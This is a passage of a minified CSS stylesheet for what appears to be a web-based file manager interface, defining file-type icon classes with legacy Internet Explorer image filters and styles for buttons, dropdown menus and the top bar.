\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vss.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vss.png?ver=3.30',sizingMethod='scale');}.x-vst{background-image:url("../../../images/file_icon/icon_file/vst.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vst.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vst.png?ver=3.30',sizingMethod='scale');}.x-vsx{background-image:url("../../../images/file_icon/icon_file/vsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsx.png?ver=3.30',sizingMethod='scale');}.x-vtx{background-image:url("../../../images/file_icon/icon_file/vtx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vtx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vtx.png?ver=3.30',sizingMethod='scale');}.x-xaml{background-image:url("../../../images/file_icon/icon_file/xaml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');}.x-xap{background-image:url("../../../images/file_icon/icon_file/xap.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');}.x-xls{background-image:url("../../../images/file_icon/icon_file/xls.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');}.x-xlsb{background-image:url("../../../images/file_icon/icon_file/xlsb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');}.x-xlsm{background-image:url("../../../images/file_icon/icon_file/xlsm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');}.x-xlsx{background-image:url("../../../images/file_icon/icon_file/xlsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');}.x-xlt{background-image:url("../../../images/file_icon/icon_file/xlt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');}.x-xltx{background-image:url("../../../images/file_icon/icon_file/xltx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');}.x-xml{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-xps{background-image:url("../../../images/file_icon/icon_file/xps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');}.x-xsd{background-image:url("../../../images/file_icon/icon_file/xsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');}.x-xsl{background-image:url("../../../images/file_icon/icon_file/xsl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');}.x-y{background-image:url("../../../images/file_icon/icon_file/y.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');}.x-zip{background-image:url("../../../images/file_icon/icon_file/zip.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');}.x-3dm,.x-3ds,.x-asm,.x-cam360,.x-catpart,.x-catproduct,.x-cgr,.x-collaboration,.x-dae,.x-dgn,.x-dlv3,.x-dwf,.x-dwfx,.x-dwg,.x-dwt,.x-dxf,.x-exp,.x-f3d,.x-fbx,.x-g,.x-gbxml,.x-iam,.x-idw,.x-ifc,.x-ige,.x-iges,.x-igs,.x-ipt,.x-jt,.x-model,.x-neu,.x-nwc,.x-nwd,.x-obj,.x-prt,.x-rvt,.x-sab,.x-sat,.x-session,.x-skp,.x-sldasm,.x-sldprt,.x-smb,.x-smt,.x-ste,.x-step,.x-stl,.x-stla,.x-stlb,.x-stp,.x-wire,.x-x_b,.x-x_t,.x-xas,.x-xpr{background-image:url("../../../images/file_icon/icon_file/autodesk/autodesk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');}.x-3ds{background-image:url("../../../images/file_icon/icon_file/autodesk/3ds.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');}.x-3dm{background-image:url("../../../images/file_icon/icon_file/autodesk/3dm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');}.x-dae{background-image:url("../../../images/file_icon/icon_file/autodesk/dae.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');}.x-stl,.x-stla,.x-stlb{background-image:url("../../../images/file_icon/icon_file/autodesk/stl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');}.x-dwg{background-image:url("../../../images/file_icon/icon_file/autodesk/dwg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');}.x-dwf{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dwfx{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dxf{background-image:url("../../../images/file_icon/icon_file/autodesk/dxf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');}.x-ifc{background-image:url("../../../images/file_icon/icon_file/autodesk/ifc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');}.x-iam{background-image:url("../../../images/file_icon/icon_file/autodesk/iam.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');}.x-fbx{background-image:url("../../../images/file_icon/icon_file/autodesk/fbx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');}.x-rvt{background-image:url("../../../images/file_icon/icon_file/autodesk/rvt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');}.x-skp{background-image:url("../../../images/file_icon/icon_file/autodesk/skp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');}.x-vnd,.x-dgn{background-image:url("../../../images/file_icon/icon_file/autodesk/vnd-dgn.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');}.x-folder{background-image:url("../../../images/file_icon/icon_others/folder.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');}.x-folder-share{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-recycle{background-image:url("../../../images/file_icon/icon_others/recycle.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');}.x-recycle-full{background-image:url("../../../images/file_icon/icon_others/recycle_full.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');}.x-path-self-share{background-image:url("../../../images/file_icon/icon_others/path_self_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');}.x-app-link{background-image:url("../../../images/file_icon/icon_others/app_link.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');}.x-user{background-image:url("../../../images/file_icon/icon_others/user.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');}.x-user-self{background-image:url("../../../images/file_icon/icon_others/userSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');}.x-share{background-image:url("../../../images/file_icon/icon_others/share.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');}.x-group-self{background-image:url("../../../images/file_icon/icon_others/groupSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');}.x-group-self-owner{background-image:url("../../../images/file_icon/icon_others/groupSelfOwner.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');}.x-group-guest{background-image:url("../../../images/file_icon/icon_others/groupGuest.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');}.x-group-self-root{background-image:url("../../../images/file_icon/icon_others/groupSelfRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');}.x-group-root{background-image:url("../../../images/file_icon/icon_others/groupRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');}.x-group-public{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-tree-self{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-computer{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-tree-fav{background-image:url("../../../images/file_icon/icon_others/treeFav.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');}.x-edit{background-image:url("../../../images/file_icon/icon_others/edit.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');}.x-search{background-image:url("../../../images/file_icon/icon_others/search.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');}.x-upload{background-image:url("../../../images/file_icon/icon_others/upload.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');}.x-setting{background-image:url("../../../images/file_icon/icon_others/setting.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');}.x-logout{background-image:url("../../../images/file_icon/icon_others/logout.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');}.x-app-store{background-image:url("../../../images/file_icon/icon_others/appStore.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');}.x-error{background-image:url("../../../images/file_icon/icon_others/error.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');}.x-info{background-image:url("../../../images/file_icon/icon_others/info.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');}.frame-fullscreen{position:fixed;z-index:999499;left:0;top:0;}.font-icon{font-family:FontAwesome;font-style:normal;color:inherit;}.dragMaskView{position:absolute;top:0;left:0;right:0;bottom:0;z-index:888;background:#fff;opacity:0.01;filter:alpha(opacity=1);-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.content-box .ace_cjk{width:1em !important;}.content-box .ace_static_highlight{font-size:1.15em;}.aui-buttons button{font-size:1em;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.dialog-change-max,.dialog-change-max .aui-main{-webkit-transition:all 0.25s;-moz-transition:all 0.25s;-o-transition:all 0.25s;-ms-transition:all 0.25s;transition:all 0.25s;}.aui-title span{position:absolute;width:80%;overflow:hidden;height:30px;word-break:break-all;text-overflow:ellipsis;white-space:nowrap;}.less-error-message{display:none;}[class^="icon-"],[class*=" icon-"]{background-image:auto;}.btn-group-sm>.btn{padding:4px 10px;line-height:1em;}.btn{padding:6px 14px;border-radius:3px;box-sizing:content-box;}.btn:focus{outline:none;}.btn.btn-default .font-icon{color:#999;}.btn.btn-default:active,.btn.btn-default.active{border-color:#ADADAD;color:#888;}.btn.btn-left{border-top-right-radius:0;border-bottom-right-radius:0;}.btn.btn-middle{border-radius:0;}.btn.btn-right{border-top-left-radius:0;border-bottom-left-radius:0;}.btn.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;}.btn.btn-nomal{padding:4px 12px;}.btn.btn-sm{padding:2px 10px;}.btn.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;}.btn.btn-active{background:#63acff !important;border-color:#4fa1ff !important;border-bottom-color:#449cff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8cc2ff', endColorstr='#63acff');background-image:-webkit-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-moz-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-o-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-ms-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);-pie-background:linear-gradient(to to bottom,#8cc2ff 0,#63acff 100%);}.btn.btn-active:hover,.btn.btn-active:active{background:#3a96ff !important;border-color:#268bff !important;border-bottom-color:#1c86ff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#63acff', endColorstr='#3a96ff');background-image:-webkit-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-moz-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-o-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-ms-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:linear-gradient(to bottom,#63acff 0,#3a96ff 100%);-pie-background:linear-gradient(to to bottom,#63acff 0,#3a96ff 100%);}.btn-group.disabled{opacity:0.6;filter:alpha(opacity=60);}.dropdown-menu{left:auto;right:0px;border-radius:4px;border:1px solid rgba(0,0,0,0.05);box-shadow:0 4px 30px rgba(0,0,0,0.15);max-height:400px;margin-top:0;}.dropdown-menu>li>a:hover,.dropdown-menu .this a,.dropdown-menu>li>a:focus{-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;background-image:none;filter:none;background:#63acff;color:#fff;}.dropdown-menu>li>a{font-weight:inherit;color:#666;}.dropdown-menu>li>a .font-icon{opacity:0.8;}.dropdown-menu:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);border-right:6px solid rgba(0,0,0,0);border-bottom:6px solid #FFF;position:absolute;top:-6px;right:10px;}.dropdown-menu:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);top:-7px;border-bottom:7px solid #CCC;border-bottom-color:rgba(0,0,0,0.2);right:9px;}.dropdown-menu.menu-top:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);top:inherit;border-right:6px solid rgba(0,0,0,0);border-top:6px solid #FFF;border-bottom:none;position:absolute;bottom:-6px;right:10px;}.dropdown-menu.menu-top:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-bottom:none;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);bottom:-7px;border-top:7px solid #CCC;border-top-color:rgba(0,0,0,0.2);right:9px;top:inherit;}.dropdown-menu .divider{margin:0.3em 0;}input{border:1px solid #ddd;background:#fff;outline:none;}input[type="radio"],input[type="checkbox"]{border:none;background:none;}.topbar{width:100%;height:40px;color:#ddd;top:0;background:#63acff;position:absolute;z-index:auto;}.topbar .content{padding:0px;line-height:40px;height:39px;word-break:break-all;}.topbar .content i.font-icon{display:inline-block;padding-right:10px;font-size:1.1em;}.topbar .content .topbar-menu{display:block;text-decoration:none;color:#fff;border:1px solid #4a9eff;overflow:hidden;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;padding:0px 1.2em;border-top:none;border-bottom:none;outline:none;float:left;margin-left:-1px;font-size:14px;}.topbar .content .topbar-menu.title{font-size:20px;width:200px;width:202px\0;padding:0;text-align:center;}.topbar .content .topbar-menu.title:hover{background:none;}.topbar .content .topbar-menu .icon{width:25px;height:25px;margin-right:5px;padding:0;margin-top:-4px;font-size:13px;line-height:25px;text-align:center;background:none;}.topbar .content .title img{max-width:200px;max-height:44px;}.topbar .content .open .topbar-menu,.topbar .content .topbar-menu:hover,.topbar .content .topbar-menu.this{background:#4a9eff;}.topbar .content .menu-desktop:before{content:"\f108";}.topbar .content .menu-explorer:before{content:"\f0ae";}.topbar .content .menu-editor:before{content:"\f044";}.topbar .content .top-left{overflow:hidden;height:40px;width:70%;}.topbar .content .top-right{position:absolute;right:0px;top:0px;margin-right:0px;height:40px;}.topbar .content .top-right .menu-group{height:40px;margin-right:-1px;float:left;position:relative;}.topbar .content .top-right .topbar-menu{display:inline-block;padding:0px 6px;margin-right:1px;}.topbar .content .top-right .topbar-menu i{padding-right:3px;}.topbar .content .top-right .btn{color:#fff;}.topbar .content .top-right ul a{line-height:30px;height:30px;display:block;padding:0px 1.7em;border:none;overflow:hidden;}.topbar .content .top-right ul a:hover,.topbar .content .top-right ul a.this{margin-right:0px;}.topbar .content .top-right ul a.this{background:#63acff;color:#fff;}.topbar .content .top-right ul .font-icon{width:18px;display:inline-block;}.topbar .content .top-right ul.dropdown-menu{margin-top:-1px;}.topbar .content .top-right ul.dropdown-menu.topbar-language{width:470px;padding:10px 5px;}.topbar .content .top-right ul.dropdown-menu.topbar-language li{width:115px;float:left;margin:0 1px 1px 0;}.topbar .content .top-right ul.dropdown-menu.topbar-language a{padding:0 8px 0 8px;height:26px;line-height:26px;font-size:13px;}.topbar 